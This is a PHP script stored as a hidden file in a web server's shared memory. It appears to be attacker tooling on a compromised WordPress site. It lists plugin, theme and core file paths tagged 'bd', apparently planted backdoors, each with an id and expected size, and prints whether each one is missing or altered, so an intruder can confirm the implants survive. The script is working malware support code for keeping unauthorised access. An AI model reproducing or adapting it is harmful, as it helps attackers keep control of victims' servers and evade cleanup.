File: //proc/thread-self/root/dev/shm/.itm
<?php $r = '/home/onlyitok/alrumaih-ksa.com'; $x = ["/wp-content/plugins/wp-smushit/app/views/integrations/meta-box.php"=>"bd@@140574@@20",
"/wp-content/themes/woostify/inc/widget/class-woostify-recent-post-thumbnail.php"=>"bd@@140644@@53",
"/wp-includes/block-supports/align.php"=>"bd@@112594@@83",
"/wp-content/themes/woostify/inc/customizer/class-woostify-customizer.php"=>"bd@@84382@@75",
"/wp-content/plugins/robin-image-optimizer/libs/factory/forms/controls/paddings-editor.php"=>"bd@@35165@@20",
"/wp-content/plugins/imagify/inc/deprecated/classes/class-imagify-notices-deprecated.php"=>"bd@@84391@@35",
"/wp-content/plugins/all-in-one-seo-pack-old/vendor/woocommerce/action-scheduler/classes/actions/ActionScheduler_CanceledAction.php"=>"bd@@84362@@17",
"/wp-content/plugins/robin-image-optimizer/migrations/index.php"=>"bd@@112598@@63",
"/wp-content/plugins/robin-image-optimizer/libs/factory/templates/pages/templates/impressive-lite/class.page.template.impressive.lite.php"=>"bd@@38757@@653",
"/wp-content/plugins/all-in-one-seo-pack-old/app/Common/Schema/Graphs/WebPage/editfile.php"=>"bd@@98423@@1888",
"/wp-content/plugins/wp-smushit/app/views/cdn/disabled-meta-box.php"=>"bd@@140585@@91"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');